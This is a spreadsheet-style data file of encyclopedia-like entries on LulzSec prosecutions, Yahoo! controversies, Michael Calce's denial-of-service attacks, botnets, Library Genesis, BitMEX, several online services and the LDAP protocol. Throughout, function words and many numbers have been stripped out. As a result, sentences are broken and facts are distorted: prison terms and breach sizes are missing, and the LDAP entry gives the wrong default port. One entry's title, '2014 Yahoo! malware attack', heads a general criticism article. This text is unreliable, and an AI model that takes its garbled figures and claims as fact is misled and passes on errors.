launch denial-of-service attack serious organised crime unit contrary criminal 1977, criminal conspiracy also criminal 1977. police confiscated dell laptop 100-gigabyte hard drive different virtual machines. details relating attack sony hundreds thousands email addresses passwords found computer. london court released davis bail conditions live curfew parents access internet. lawyer gideon cammerman stated that, client help publicize lulzsec anonymous attacks, lacked technical skills anything sympathizer.in early september 2011, scotland yard made arrests relating lulzsec. police arrested 24-year-old male mexborough, south yorkshire 20-year-old male warminster, wiltshire. accused conspiring commit offenses computer misuse 1990; police said arrests related investigations lulzsec member kayla.on september 2011, arrested cody kretsinger, 23-year-old phoenix, arizona indicted charges conspiracy unauthorized impairment protected computer. suspected using name "recursion" assisting lulzsec early hack sony pictures entertainment, though allegedly erased hard drives used carry attack. kretsinger released recognizance conditions access internet except work travel states arizona, california, illinois. case filed angeles, sony pictures located. kretsinger pleaded guilty april 2012 count conspiracy count unauthorized impairment protected computer. april 2013, kretsinger sentenced "unauthorized impairment protected computers" year federal prison, year home detention following completion prison sentence, fine $605,663 restitution sony pictures 1000 hours community service.on august 2013, raynaldo rivera, known online moniker "neuron", chandler, arizona, sentenced year federal prison united states district judge john kronstadt. addition prison sentence, judge kronstadt ordered rivera serve months home detention, perform 1,000 hours community service $605,663 restitution sony pictures.on march 2012, great britain, united states, ireland charged connection alleged involvement lulzsec. revealed supposed lulzsec leader hector xavier monsegur, went username sabu, aiding enforcement since pleading guilty twelve counts, including conspiracy computer hacking, august 2011 part plea deal. exchange cooperation, federal prosecutors agreed prosecute monsegur computer hacking, also prosecute attempts sell marijuana, possession illegal handgun, purchasing stolen property, charging $15,000 former employer's credit card case identity theft, directing people prescription drugs illegal sources. still faces misdemeanor charge impersonating federal agent. five suspects charged conspiracy: jake davis, accused hacker "topiary" (who previously arrested); ryan ackroyd london, accused "kayla"; darren martyn ireland, accused "pwnsauce"; donncha o’cearrbhail ireland, accused "palladium"; jeremy hammond chicago, accused "anarchaos". while member lulzsec, authorities suspect hammond member anonymous charged access device fraud hacking relation supposed involvement december 2011 attack intelligence company stratfor part operation antisec.on april 2013, jake 'topiary' davis three lulzsec members pleaded guilty charges computer hacking southwark crown court london.on april 2013, australian federal police arrested 24-year-old matthew flannery point clare, boasted facebook "i’m leader lulzsec". flannery, went username aush0k, arrested alleged hacking narrabri shire council website homepage sexually explicit text image left. august 2014, flannery entered guilty pleas five charges making unauthorised modification data cause impairment, dishonestly obtaining commonwealth bank details woman. flannery, said reference lulzsec joke, lost computer technician security company. october 2014, sentenced months house arrest continues mid-april 2016, alongside months good behaviour bond. also anonymous (group) hacktivism lulzraft malsec operation antisec operation payback 2011 playstation network outage securax references external links lulzsec wayback machine (archive index) lulz security twitter lulzsecurity.org current website referencing latest attacks group lulzsecreborn</t>
  </si>
  <si>
    <t>PlagTracker</t>
  </si>
  <si>
    <t>plagtracker ukrainian-based online plagiarism detection service checks whether similar text content appears elsewhere web. launched 2011 devellar. plagtracker used content owners (students, teachers, bloggers, researchers) detect cases "content theft", content copied, without permission author owner, site another. many content publishers also detect cases content fraud, content repackaged sold original content.in july 2011, website sees percent visitors coming asia 5,000 daily visitors. number biggest user site, india second place. other heavy users malaysia, philippines, pakistan, singapore, overview initially text original content transferred webpage; plagtracker returns list pages contain similar text parts content. matching text highlighted found page.for using, program take time develop report based length paper amount plagiarized content. once report appears, potentially plagiarized portions paper highlighted show plagiarized content. clicking highlighted portions paper reveal list site sites content come from. plagtracker used abundance united states, finland, united kingdom asian countries bangladesh, indonesia, philippines, india, pakistan, others.plagtracker also provides premium service allows user upload documents instead copying pasting text. premium users, stronger plagiarism checking professional editing assistance available. premium plan faster free version. users also perform grammar checks download upload files. design independent evaluation plagtracker uses proprietary algorithm scan given document compare content sources across database academic papers internet. uses algorithms identify copied content modified original form. multilingual (english, french, german, spanish, romanian) though algorithm also analyzes latin cyrillic symbols. also plagiarism plagiarism detection references external links official website</t>
  </si>
  <si>
    <t>2014 Yahoo! malware attack</t>
  </si>
  <si>
    <t>multinational internet corporation yahoo! received criticism variety issues. paid inclusion controversy march 2004, yahoo! launched paid inclusion program whereby commercial websites guaranteed listings yahoo! search engine payment. this scheme lucrative proved unpopular website marketers (who reluctant pay), public (who unhappy paid-for listings indistinguishable search results). october 2006, paid inclusion ceased guarantee commercial listing helped paid inclusion customers, crawling site often providing statistics searches page additional smart links (provided customers feeds) actual url. adware spyware yahoo! also criticized funding spyware adware advertising yahoo!'s clients often appears on-screen pop-ups generated adware user installed computer without realizing accepting online offers download software computer clocks improve computer security, browser enhancements, etc. frequency advertising pop-ups spyware, generated partnership advertising distributor walnut ventures, direct partnership direct revenue, could increased decreased based yahoo!'s immediate revenue needs, according former employees yahoo!'s sales department. work people's republic china while technologically financially [yahoo] giants, morally pygmies[.] it's complicated. yahoo!, along google china, microsoft, cisco, aol, skype, nortel others, cooperated communist party china implementing system internet censorship mainland china. unlike google microsoft, generally keep confidential records users outside mainland china, yahoo! stated company cannot protect privacy confidentiality mainland chinese customers authorities.critics companies profits principles. human rights watch reporters without borders state "ironic companies whose existence depends freedom information expression taken role censor." outing chinese dissidents september 2005, reporters without borders reported april 2005, tao, journalist working chinese newspaper, sentenced years prison changsha intermediate people's court hunan province, china (first trial case 29), "providing state secrets foreign entities". "secrets" brief list censorship orders sent yahoo! mail account asia democracy forum anniversary tiananmen square protests 1989.the verdict published chinese government stated sent email anonymous yahoo! account, yahoo! holdings (the hong kong subsidiary yahoo) told chinese government address used send email registered hunan newspaper worked for, police went straight offices picked february 2006, yahoo! general counsel submitted statement u.s. congress yahoo! denied knowing true nature case tao. april 2006, yahoo! holdings (hong kong) investigated hong kong's privacy commissioner personal data. june 2006, union representing journalists ireland (nuj) called 40,000 members boycott yahoo! inc. products services protest internet company's reported actions china.in july 2007, evidence surfaced detailing warrant chinese authorities sent yahoo! officials, highlighting "state secrets" charge tao. warrant requests "email account registration information huoyan1989@yahoo.com.cn, login times, corresponding addresses, relevant email content february 2004 present." analyst reports human rights organizations said evidence directly contradicts yahoo!'s testimony u.s. congress february 2006.yahoo! contends must respect laws governments jurisdictions operating. criticism yahoo! intensified february 2006 reporters without borders released chinese court documents stating yahoo! aided chinese authorities case dissident zhi. december 2003 sentenced years imprisonment "inciting subversion". wang xiaoning wang xiaoning chinese dissident shenyang arrested authorities people's republic china publishing controversial material online. 2000 2001, wang, engineer profession, posted electronic journals yahoo! group calling democratic reform single-party rule. arrested september 2002 yahoo! assisted chinese authorities providing information. september 2003, wang convicted charges "incitement subvert state power" sentenced years prison.on april 2007, xiaoning's wife ling sued yahoo! human rights laws federal court francisco, california, united states. wang xiaoning named plaintiff yahoo! suit, filed help world organization human rights usa. "yahoo! guilty corporate irresponsibility,' said morton sklar, executive director group. "yahoo! reason know provided china identification information individuals would arrested."yahoo!'s decision assist china's authoritarian government came part policy reconciling services chinese government's policies. this came china blocked yahoo! services time. reported washington post many media sources: suit says 2001, wang using yahoo! e-mail account post anonymous writings internet mailing list. suit alleges yahoo!, pressure chinese government, blocked account. wang account yahoo! began sending material again; suit alleges yahoo! gave government information allowed identify arrest wang september 2002. suit says prosecutors chinese courts cited yahoo!'s cooperation.human rights organizations groups basing case 217-year-old u.s. punish corporations human rights violations abroad, effort bush administration opposed: recent years, activists working overseas plaintiffs sued roughly dozen businesses alien tort claims act, activists grants jurisdiction american courts acts abroad violate international norms. written founding fathers 1789 different purpose, rarely invoked 1980s.on august 2007, world organization human rights sued yahoo! allegedly passing information (email address) chinese government caused arrests writers dissidents. lawsuit filed francisco journalists, tao, wang xiaoning. yahoo! stated supported privacy free expression worked technology companies solve human rights concerns.on november 2007, congressional panel criticised yahoo! giving full details house foreign affairs committee previous year, stating best inexcusably negligent" worst "deceptive". user-created chat rooms, message boards, profiles result media scrutiny relating internet child predators lack significant revenues, yahoo!'s "user created" chatrooms closed june 2005. yahoo! news' message board section closed december 2006, trolling phenomenon. addition, mid-october, 2008, yahoo! deleted information millions user profiles advance notice little explanation. image search 2006, yahoo!'s image search criticized bringing sexually explicit images even safesearch this discovered teacher intending service class search "www". yahoo!'s response was, "yahoo! aware issue working resolve quickly possible". shark controversy yahoo! previously owned 14.95% stake alibaba, criticized facilitating sale shark-derived products. after investing alibaba, yahoo! executives asked issue, responded: know sale shark products legal asia centuries-old tradition. this issue largely cultural-practices one." alibaba would later sale shark fins platform 2009. geocities closure geocities popular hosting service founded 1994. point yahoo! purchased january 1999, reportedly third most-browsed site world wide web. despite popularity, still become profitable late 1998.ten years later yahoo! closed geocities, deleting millions pages process. september 2009, month closed, geocities received 10,477,049 unique visitors.vijay mukhi, internet cybersecurity expert quoted business standard, criticized yahoo's management geocities; mukhi described geocities lost opportunity yahoo!", adding "they could made facebook wanted." rich skrenta, blekko, posted twitter offer take geocities yahoo! exchange future revenue share. yahoo! groups remodel 2010 august 2010 yahoo! groups started rolling major software change. this change denounced vast majority users. september 2010, stoneham, vice president yahoo!'s communities products, announced based members feedback, yahoo! groups would rolling back recent changes. flickr redesign 2013 2013, flickr, yahoo!'s image video hosting website, unveiled redesigned layout additional features, including terabyte free storage users, seamless photostream, cover photo updated android app. redesigned layout fills page dynamically re-sized photos and, home page, displays recent comments photos. tech radar described style flickr representing "sea change" purpose. many users criticized changes, site's help forum received thousands negative comments. 2014 malware attack january 2014, large scale malware attack discovered netherlands targeted java dated back december 2013, especially affecting users romania, france, delivered 300,000 yahoo! users hour discovered yahoo! criticized providing public guidance number users affected advice affected users policy requiring phone number december 2016, yahoo began forcing users email service include phone number profile, lack denies access e-mail accounts. data breaches company reported major data breaches user account data hackers second half 2016. first announced breach, reported september 2016, occurred sometime late 2014, affected million yahoo! user accounts. separate data breach, occurring earlier around august 2013, reported december 2016, affected billion user accounts. both breaches considered largest discovered history internet. specific details material taken include names, email addresses, telephone numbers, encrypted unencrypted security questions answers, dates birth, encrypted passwords. further, yahoo! reported late 2014 breach likely used manufactured cookies falsify login credentials, allowing hackers gain access account without password.yahoo! criticized late disclosure breaches security measures, currently facing several lawsuits well investigation members united states congress. breaches also question verizon communications's july 2016 plans acquire yahoo! $4.8 billion. cancelling user's account without notice yahoo terms service allow cancel user's account, without notice, discretion. some users lost access data, including personal pictures, means recovery. allegations sexism scott ard, prominent editorial director fired yahoo 2015, filed lawsuit accusing mayer leading sexist campaign purge male employees. ard, male employee, stated "mayer encouraged fostered employee performance-rating system] accommodate management's subjective biases personal opinions, detriment yahoo's male employees". suit, claimed that, prior firing, received "fully satisfactory" performance reviews since starting company 2011 head editorial programming yahoo's home page, relieved role given woman recently hired megan lieberman, editor-in-chief yahoo news.the lawsuit states: liberman stated terminating [ard] received requested breakdown [his] duties. [ard] already provided information requested, however, reminded liberman done liberman's excuse terminating [ard] pretext. second sexual discrimination lawsuit filed separately gregory anderson, fired 2014, alleging company's performance management system arbitrary unfair, making second sexism lawsuit yahoo mayer faced 2016. illegally accessing user accounts october 2019, former yahoo engineer, reyes daniel ruiz, pleaded guilty federal charges illegally accessing user accounts. ruiz hacked 6,000 users' accounts, including friends, co-workers many young women, seeking sexual images videos. also criticism apple criticism facebook criticism google criticism microsoft references</t>
  </si>
  <si>
    <t>List of cryptocurrencies</t>
  </si>
  <si>
    <t>after creation bitcoin, number cryptocurrencies available internet growing. this list notable cryptocurrencies. active currencies date introduction inactive currencies also list digital currencies notes references</t>
  </si>
  <si>
    <t>Michael Calce</t>
  </si>
  <si>
    <t>michael calce (born 1984, also known mafiaboy) security expert former computer hacker bizard, quebec, launched series highly publicized denial-of-service attacks february 2000 large commercial websites, including yahoo!, fifa.com, amazon.com, dell, inc., e*trade, ebay, cnn. also launched series failed simultaneous attacks nine thirteen root name servers. early life calce born west island area montreal, quebec. when five, parents separated lived mother lengthy battle primary custody. every second weekend would stay father's condo montreal proper. felt isolated friends back home troubled separation parents, father purchased computer six. instantly hold him: remember sitting listening beep, gurgle churn processed commands. remember screen front face. there something intoxicating idea dictating everything computer did, smallest functions. computer gave six-year-old, sense control command. nothing else world operated way." project rivolta february 2000, calce targeted yahoo! project named rivolta, meaning "rebellion" italian. rivolta ddos (distributed-denial-of-service) attack servers become overloaded different types communications point become unresponsive commands. time, yahoo! multibillion-dollar company search engine. mafiaboy's rivolta managed shut yahoo! almost hour. calce's goal was, according him, establish dominance tnt, cybergroup, cyberworld. buy.com targeted similar attack afterwards attributed calce. calce claims responsible different hacker performed ddos challenge coax targeting websites. calce responded turn bringing ebay, cnn, amazon, dell ddos next week.in 2011 interview, calce claimed attacks launched unwittingly, inputting known addresses security tool downloaded repository defunct file-sharing platform hotline, developed hotline communications. calce left school, forgetting application continued attacks day. upon coming home calce says found computer crashed, restarted unaware gone day. calce claimed overheard news recognized companies mentioned inputted earlier day, "started understand might happened". aftermath u.s. federal bureau investigation royal canadian mounted police first noticed calce started claiming chatrooms responsible attacks. became chief suspect claimed brought dell's website, attack publicized time. information source attacks initially discovered reported press michael lyle, chief technology officer recourse technologies. australian news anchor sandra sully reported apparently australian coder initiated sting performed channel. unreported using nickname ocker. calce initially denied responsibility later pleaded guilty charges brought him. lawyer insisted child unsupervised tests help design improved firewall, whereas trial records indicated youth showed remorse expressed desire move italy computer crime laws. montreal youth court sentenced september 2001 eight months "open custody," year probation, restricted internet, small fine.matthew kovar, senior analyst market research firm yankee group, generated publicity told reporters attacks caused us$1.2 billion global economic damages. media outlets would later attribute then-1.45:1 conversion value billion royal canadian mounted police. computer security experts often cite larger figure (sometimes incorrectly declaring u.s. dollars), published report says trial prosecutor gave court figure roughly $7.5 million. significance while testifying hearing members united states congress, computer expert winn schwartau said "government commercial computer systems poorly protected today essentially considered defenseless electronic pearl harbor waiting happen." fact largest website world could rendered inaccessible 15-year-old created widespread concern. time, internet already become integral part north american economy. consumers lost confidence online business american economy suffered minor blow result. former agent craig guent credits mafiaboy significant increase online security took place decade. later years during latter half 2005, wrote column computer security topics journal montréal.in late 2008, journalist craig silverman, calce announced writing book, mafiaboy: cracked internet it's still broken.on october 2008, appeared television program tout monde parle discuss book. book received generally positive reviews.calce appeared show, last call carson daly, talking days hacker, president clinton became involved, ultimately landed jail 15.in 2014, calce appeared twelfth episode criminal podcast. references</t>
  </si>
  <si>
    <t>Library Genesis</t>
  </si>
  <si>
    <t>library genesis (libgen) file-sharing based shadow library website scholarly journal articles, academic general-interest books, images, comics, audiobooks, magazines. site enables free access content otherwise paywalled digitized elsewhere. libgen describes "links aggregator", providing searchable database items "collected publicly available public internet resources" well files uploaded "from users".libgen provides access copyrighted works, pdfs content elsevier's sciencedirect web-portal. publishers like elsevier accused library genesis internet piracy. others assert academic publishers unfairly benefit government-funded research, written researchers, many employed public universities, libgen helping disseminate research freely available first place. history library genesis roots illegal underground samizdat culture soviet union. society access printing strictly controlled heavy-handed censorship, dissident intellectuals hand copied retyped manuscripts secret circulation. this legalized soviet general secretary mikhail gorbachev 1980s, expanded rapidly time affordable desktop computers scanners, small research budgets. volunteers moved russian computer network ("runet") 1990s, became awash hundreds thousands uncoordinated contributions. librarians became especially active, using borrowed access passwords download copies scientific scholarly articles western internet sources, uploading runet. early 21st century, efforts became coordinated, integrated massive system known library genesis, libgen, around 2008. subsequently absorbed contents became functional successor library.nu, shut legal action 2012. 2014, catalog twice size library.nu million records. july 2019, library genesis claims million non-fiction books, million science magazine articles, million comics files, million fiction books, million magazine issues.in 2020, project forked alternate domain, "libgen.fun", internal conflict within project. result, databases maintained independently content differs libgen.fun libgen domains. legal issues litigation 2015, library genesis became involved legal case elsevier, accused copyright infringement granting free access articles books. response, admins accused elsevier gaining profits publicly funded research freely available paid taxpayers.in late october 2015, district court southern district york ordered libgen shut suspend domain name (libgen.org), site accessible alternate domains. hosting country libgen reported registered russia netherlands, making appropriate jurisdiction legal action unclear. blocks libgen blocked number isps united kingdom, dns-based blocks claimed little deter access. also blocked isps france, germany, greece, belgium (which redirects belgian federal police blockpage), russia november 2018). usage until 2014, sci-hub, provides free access millions research papers books, relied libgen storage. papers requested users requested libgen served available, otherwise fetched means stored libgen.in 2019 archivists freedom information activists launched project better seed host libgen's data dumps. project's spokesperson coordinator 'shrine' described effort "permanent library card world" reported response "overwhelmingly positive everyone". 2020, project launched peer-to-peer digital library content sci-hub library genesis using ipfs. also guerilla open access manifesto icanhazpdf samizdat sci-hub z-library explanatory notes references external links list mirrors gateways, including status. karaganis, joe; bodo, balazs (2018-07-13). "analysis russia building napster academic research". washington post. retrieved 2019-10-09.</t>
  </si>
  <si>
    <t>MiMedia</t>
  </si>
  <si>
    <t>mimedia cloud-based online backup service company created mimedia platform, next generation consumer cloud platform enables types personal media (photos, videos, music, docs, contacts sms) secured cloud, accessed seamlessly, across devices (smartphones, tablets, laptops desktops, web) operating systems (android, ios, mac, time. launched 2010 technology startup company mimedia, llc, based brooklyn, york. chris giordano current ceo. 2012 mimedia announced users receive 10gb storage starter plan (free).in 2011, mimedia unveiled pricing plan, users storage space freein august 2015, micromax informatics invested mimedia.in january 2016, mimedia announced raised million series round number global family offices.on march 2022 mimedia began trading toronto venture exchange (tsxv) symbol: "mim" reverse takeover transaction. description business mimedia built mimedia platform, next generation consumer cloud platform enables consumers access personal content (photos, videos, music, documents, contacts), device operating system, whenever want. backed portfolio issued patents approximately us$45 million development, mimedia platform mimedia’s technology innovative answer today’s consumer clouds, mainly enterprise-focused, work-file sharing solutions offering utility-like experiences. mimedia differentiates highly visual interface, rich media experiences, robust content curation tools, private sharing platform families deeper promotion content (re)discovery.mimedia solves important problems consumers providing security, organization, ease use, ubiquitous access true private sharing cherished personal content. mimedia platform enables consumers access content device seamlessly integrating seven apps one, simple-to-use platform desktop apps mac, smartphone apps android, tablet apps android works browsers.mimedia also uniquely solves important problems distribution partners serve consumers namely oems telcos. leaders large market segments struggle customer retention, margins, limited digital revenue strategies heavy market competition likes google apple well local, in-market players. business model mimedia operates business model recurring, high-margin diversified multiple revenue streams: subscriptions freemium model: free storage plan multiple paid plans upgrade storage. mobile advertising: non-intrusive advertisements within smartphone gallery. value added services: photo printing, premium photo editing digital scanning, among others.mimedia either share revenue generated partners charge license user software. branding deals either “mimedia” ingredient, “powered-by mimedia” branding. selection deployment revenue streams depend target country dynamics. mimedia’s revenue streams deployed generating revenue today, mimedia’s primary revenue engine mobile advertisements showing strong consistent metrics scale support core model’s go-forward assumptions.mimedia’s partners assume major cost components typical mimedia’s business model, thus driving higher margins mimedia. references</t>
  </si>
  <si>
    <t>Mevade Botnet</t>
  </si>
  <si>
    <t>mevade botnet, also known sefnit sbc, massive botnet. operators unknown motives seems multi-purpose.in late 2013 anonymity network sudden significant increase users, 800,000 daily 5,000,000. botnet suspected fingers pointed mevade. trend micro reported smart protection network module distributed mevade trojans. also conficker command control (malware) gameover zeus operation tovar timeline computer viruses worms tiny banker trojan torpig zeus (malware) zombie (computer science) references</t>
  </si>
  <si>
    <t>BitMEX</t>
  </si>
  <si>
    <t>bitmex cryptocurrency exchange derivative trading platform. owned operated global trading limited, registered seychelles. history bitmex founded 2014 arthur hayes, delo, samuel reed, financing family friends. bitmex completed safe round investment july 2015 shortly inducted sosv batch china accelerator program sold equity exchange labour financing. 2016, exchange introduced perpetual futures, became popular derivative product. 2018, delo became united kingdom's first billionaire bitcoin, youngest self-made billionaire.in july 2019, nouriel roubini, critic cryptocurrencies, suggested exchange involved illegal activities, allowing traders take much risk trading clients. days later, reported bloomberg commodity futures trading commission (cftc) investigating bitmex whether broke rules allowing americans trade platform.on october 2020, hayes, reed, delo, gregory dwyer indicted charges violating u.s. bank secrecy conspiracy violate law, arising allegations four failed implement anti-money laundering measures. case name "u.s. hayes al", case number 20-cr-00500, u.s. district court southern district york.on april 2021, former bitmex arthur hayes turned face u.s. charges violating bank secrecy act. released million bond pending future court proceedings york. february 2022, delo hayes pled guilty violating bank secrecy willfully failing establish, implement, maintain anti-money laundering program bitmex. pair agreed separately million criminal fine representing pecuniary gain derived offense.on march 2022, reed pleaded guilty violating bank secrecy agreed million criminal fine. reed faces maximum five years prison he’s sentenced u.s. district court judge john george koeltl york. gregory dwyer’s trial scheduled october 2022.on 2022, hayes sentenced years' probation, home confinement months.on june 2022, delo sentenced months' probation citizen returned hong kong subsequently serve probation. references</t>
  </si>
  <si>
    <t>Metulji botnet</t>
  </si>
  <si>
    <t>metulji botnet, discovered june 2011, botnet mainly involved cyberscamming denial service attacks. before botnet dismantled, consisted million individual zombie computers infected "butterfly bot", making june 2011, largest known botnet.it known type computers vulnerable, tell computer part botnet. also carna botnet command control (malware) computer worm spambot timeline notable computer viruses worms ddos zombie (computer science) zeroaccess botnet notes</t>
  </si>
  <si>
    <t>Picollator</t>
  </si>
  <si>
    <t>picollator internet search engine performs searches sites multimedia visual query (image) text, combination visual query text. picollator recognizes objects image, obtains relevance text vice versa, searches accordance information provided. description present, picollator identifies human faces images creates database people's faces. this allows user search images submitted person, lookalikes and/or similar images images found websites. because picollator works, used language. history 2006 recogmission developed desktop application photo collections management. system automatically classifies, manages retrieves photographs stored locally corporate databases. 2007 recogmission started picollator multimedia search engine project, beta stage. 2008 picollator.mobi launched universal search engine mobile phones. 2009 recogmission opens based content filter service pifilter.com [2], inherited pattern recognition technologies picollator. features most image search engines match user textual query picture tags. picollator based different approach. stores database patterns objects found image. able understand contents image compare images find similar ones. search multimedia information, user submit sample image find images relevant people image find resources text find images text find resources text image find images and/or resources. trivia picollator noun, corresponding verb picollate' first invented recogmission team. 'picollate' consists words sampled: 'picture' 'collate'. recogmission used word 'picollate' meaning process picture searching managing. picollator generally works digital photos texts offers hybrid search possibility. yet, system able process artworks even painted portraits. picollator image index contains black-and-white well coloured images. company ru:recogmission developed novel indexing engine multimedia information search based visual query. recogmission develops solutions multimedia information (image, text video) indexing searching corporate environments. references picollator loves girlish smile, inside marketers studio david berkowitz's marketing blog archived 2008-06-12 wayback machine. march 2008 picollator.com image based search engine, killerstartups.com picollator image search engine, phil bradley's weblog. march 2008 image-based queries, techpin. march 2008 picollator: buscador rostros, neoteo archived 2008-08-20 wayback machine picollator online search, buscador caras dentro imágenes online, genbeta archived 2008-07-09 wayback machine. march 2008 picollator:基于脸部特征的图片搜索引擎, 天涯海阁 archived 2008-08-05 wayback machine picollator gesichter suchen bildvorlagen, @-web suchmaschinen weblog. july 2008 picollator launches search system, tmcnet.com archived 2008-08-08 wayback machine. july 2008 picollator sucht menschen mithilfe gesichtserkennung, internet world business archived 2008-10-04 wayback machine. july 2008 sketch based query image retrieval, kmvirtual archived 2009-03-01 wayback machine. 2008 picollator текстовый визуальный поиск?, стартаперы.ru picollator найдет ваших селебрити-клонов, вебпланета. march 2008 picollator ищет похожих людей, новости медиа атлас archived 2011-10-02 wayback machine. march 2008 picollator οπτική αναζήτηση… περίπου internetakias.gr archived 2008-10-02 wayback machine. april 2008 доступны мультимедийные запросы новой поисковой системе picollator, itua.info. march 2008 найти человека рисунку лица?, newsland всевидящее онлайна, игромания. july, 2008 microsoft поднимет долю программ ввп, osp.ru july 2008 поисковик picollator, веб2н0льные заметки. april 2008 система поиска мультимедийным запросам, мониторинг интернета. april 2008 рунете запущена система мультимедийного поиска picollator.ru, elvisti.com. april 2008 мультимедийный поиск становится интеллектуальным, rocit.ru archived 2016-03-06 wayback machine. july 2008 рунете появилась система поиска похожих картинок, eplus.com.ua archived 2008-07-25 wayback machine. march 2008 ресурсы сети можно искать помощью изображений, commcenter.ru. march 2008</t>
  </si>
  <si>
    <t>Lightweight Directory Access Protocol</t>
  </si>
  <si>
    <t>lightweight directory access protocol (ldap open, vendor-neutral, industry standard application protocol accessing maintaining distributed directory information services internet protocol (ip) network. directory services play important role developing intranet internet applications allowing sharing information users, systems, networks, services, applications throughout network. examples, directory services provide organized records, often hierarchical structure, corporate email directory. similarly, telephone directory list subscribers address phone number. ldap specified series internet engineering task force (ietf) standard track publications called request comments (rfcs), using description language asn.1. latest specification version published 4511 road technical specifications provided rfc4510). common ldap provide central place store usernames passwords. this allows many different applications services connect ldap server validate users.ldap based simpler subset standards contained within x.500 standard. because relationship, ldap sometimes called x.500-lite. history telecommunication companies' understanding directory requirements well developed years producing managing telephone directories. these companies introduced concept directory services information technology computer networking, input culminating comprehensive x.500 specification, suite protocols produced international telecommunication union (itu) 1980s. x.500 directory services traditionally accessed x.500 directory access protocol (dap), required open systems interconnection (osi) protocol stack. ldap originally intended lightweight alternative protocol accessing x.500 directory services simpler (and widespread) tcp/ip protocol stack. this model directory access borrowed dixie directory assistance service protocols. protocol originally created howes university michigan, steve kille isode limited, colin robbins nexor wengyik yeong performance systems international, circa 1993, successor dixie das. mark wahl critical angle inc., howes, steve kille started work 1996 version ldap, ldapv3, aegis internet engineering task force (ietf). ldapv3, first published 1997, superseded ldapv2 added support extensibility, integrated simple authentication security layer, better aligned protocol 1993 edition x.500. further development ldapv3 specifications numerous extensions adding features ldapv3 come ietf. early engineering stages ldap, known lightweight directory browsing protocol, ldbp. renamed expansion scope protocol beyond directory browsing searching, include directory update functions. given lightweight name network intensive predecessor thus easily implemented internet relatively modest bandwidth usage. ldap influenced subsequent internet protocols, including later versions x.500, enabled directory (xed), directory service markup language (dsml), service provisioning markup language (spml), service location protocol (slp). also used basis microsoft's active directory. protocol overview client starts ldap session connecting ldap server, called directory system agent (dsa), default port 389, port ldaps (ldap tls/ssl, below). client sends operation request server, server sends responses return. with exceptions, client need wait response sending next request, server send responses order. information transmitted using basic encoding rules (ber). client request following operations: starttls ldapv3 transport layer security (tls) extension secure connection bind authenticate specify ldap protocol version search search and/or retrieve directory entries compare test named entry contains given attribute value entry delete entry modify entry modify distinguished name (dn) move rename entry abandon abort previous request extended operation generic operation used define operations unbind close connection (not inverse bind)in addition server send "unsolicited notifications" responses request, e.g. connection timed out. common alternative method securing ldap communication using tunnel. default port ldap 636. ldap common ldap version (ldapv2) never standardized formal specification. this usage deprecated along ldapv2, officially retired 2003. directory structure protocol provides interface directories follow 1993 edition x.500 model: entry consists attributes. attribute name attribute type attribute description) values. attributes defined schema (see below). each entry unique identifier: distinguished name (dn). this consists relative distinguished name (rdn), constructed attribute(s) entry, followed parent entry's think full file path relative filename parent folder (e.g. /foo/bar/myfile.txt myfile.txt would rdn).a change lifetime entry, instance, entries moved within tree. reliably unambiguously identify entries, uuid might provided entry's operational attributes. entry look like represented ldap data interchange format (ldif) (ldap binary protocol): cn=john doe,dc=example,dc=com john givenname: john telephonenumber: 6789 telephonenumber: 1232 mail: john@example.com manager: cn=barbara doe,dc=example,dc=com objectclass: inetorgperson objectclass: organizationalperson objectclass: person objectclass: "dn" distinguished name entry; neither attribute part entry. "cn=john doe" entry's (relative distinguished name), "dc=example,dc=com" parent entry, "dc" denotes 'domain component'. lines show attributes entry. attribute names typically mnemonic strings, like "cn" common name, "dc" domain component, "mail" e-mail address, "sn" surname. server holds subtree starting specific entry, e.g. "dc=example,dc=com" children. servers also hold references servers, attempt access "ou=department,dc=example,dc=com" could return referral continuation reference server holds part directory tree. client contact server. some servers also support chaining, means server contacts server returns results client. ldap rarely defines ordering: server return values attribute, attributes entry, entries found search operation order. this follows formal definitions entry defined attributes, attribute values, sets need ordered. operations operation inserts entry directory-server database. distinguished name request already exists directory, server duplicate entry result code result decimal "entryalreadyexists". ldap-compliant servers never dereference distinguished name transmitted request attempting locate entry, distinguished names never de-aliased. ldap-compliant servers ensure distinguished name attributes conform naming standards. entry added must exist, immediate superior must exist.dn: uid=user,ou=people,dc=example,dc=com changetype: objectclass:top objectclass:person uid: user last-name common-name userpassword: password example, uid=user,ou=people,dc=example,dc=com must exist, ou=people,dc=example,dc=com must exist. bind (authenticate) when ldap session created, ldap client connects server, authentication state session anonymous. bind operation establishes authentication state session. simple bind sasl plain send user's password plaintext, connections utilizing either simple sasl plain encrypted using transport layer security (tls). server typically checks password userpassword attribute named entry. anonymous bind (with empty password) resets connection anonymous state. sasl (simple authentication security layer) bind provides authentication services wide range mechanisms, e.g. kerberos client certificate sent tls.bind also sets ldap protocol version sending version number form integer. client requests version server support, server must result code bind response code protocol error. normally clients ldapv3, default protocol always ldap libraries. bind first operation session ldapv2, required ldapv3. ldapv3, successful bind request changes authentication state session unsuccessful bind request resets authentication state session. delete delete entry, ldap client transmits properly formed delete request server. delete request must contain distinguished name entry deleted request controls also attached delete request servers dereference aliases processing delete request only leaf entries (entries subordinates) deleted delete request. some servers support operational attribute hassubordinates whose value indicates whether entry subordinate entries, servers support operational attribute numsubordinates indicating number entries subordinate entry containing numsubordinates attribute. some servers support subtree delete request control permitting deletion objects subordinate subject access controls. delete requests subject access controls, whether connection given authentication state permitted delete given entry governed server-specific access control mechanisms. search compare search operation used search read entries. parameters are: baseobject name base object entry possibly root) relative search performed. scope what elements baseobject search. this baseobject (search named entry, typically used read entry), singlelevel (entries immediately base dn), wholesubtree (the entire subtree starting base dn). filter criteria selecting elements within scope. example, filter (&amp;(objectclass=person)(|(givenname=john)(mail=john*))) select "persons" (elements objectclass person) matching rules givenname mail determine whether values attributes match filter assertion. note common misconception ldap data case-sensitive, whereas fact matching rules ordering rules determine matching, comparisons, relative value relationships. example filters required match case attribute value, extensible match filter must used, example, (&amp;(objectclass=person)(|(givenname:caseexactmatch:=john)(mail:caseexactsubstringsmatch:=john*))) derefaliases whether follow alias entries (entries refer entries), attributes which attributes return result entries. sizelimit, timelimit maximum number entries return, maximum time allow search run. these values, however, cannot override restrictions server places size limit time limit. typesonly return attribute types only, attribute values.the server returns matching entries potentially continuation references. these returned order. final result include result code. compare operation takes attribute name attribute value, checks named entry contains attribute value. modify modify operation used ldap clients request ldap server make changes existing entries. attempts modify entries exist fail. modify requests subject access controls implemented server. modify operation requires distinguished name (dn) entry specified, sequence changes. each change sequence must (add value, must already exist attribute) delete (delete existing value) replace (replace existing value value)ldif example adding value attribute: dc=example,dc=com changetype: modify add: the-new-cn-value-to-be-added replace value existing attribute, replace 